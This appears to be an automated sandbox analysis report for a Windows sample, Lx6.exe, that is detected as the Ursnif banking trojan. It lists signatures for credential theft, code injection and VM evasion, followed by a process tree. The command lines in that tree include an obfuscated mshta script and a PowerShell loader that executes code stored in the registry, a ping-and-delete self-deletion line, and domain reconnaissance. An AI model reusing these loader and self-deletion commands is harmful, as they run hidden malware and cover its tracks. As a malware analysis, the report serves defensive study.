Windows
Analysis Report
Lx6.exe
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Uses net.exe to modify the status of services
Machine Learning detection for sample
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Self deletion via cmd or bat file
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Queries the current domain controller via net
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Classification
- System is w10x64
Lx6.exe (PID: 1172 cmdline: C:\Users\user\Desktop\Lx6.exe MD5: 3B892BEA0F8CBE0B61EE380743567D1D)
control.exe (PID: 3692 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
rundll32.exe (PID: 4672 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
mshta.exe (PID: 6016 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ccqf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ccqf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
powershell.exe (PID: 4292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
csc.exe (PID: 1264 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
cvtres.exe (PID: 1312 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
csc.exe (PID: 1236 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
cvtres.exe (PID: 5024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
cmd.exe (PID: 5656 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
PING.EXE (PID: 5948 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
RuntimeBroker.exe (PID: 3124 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
cmd.exe (PID: 5760 cmdline: cmd /C "wmic computersystem get domain | more > C:\Users\user\AppData\Local\Temp\9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
WMIC.exe (PID: 5296 cmdline: wmic computersystem get domain MD5: EC80E603E0090B3AC3C1234C2BA43A0F)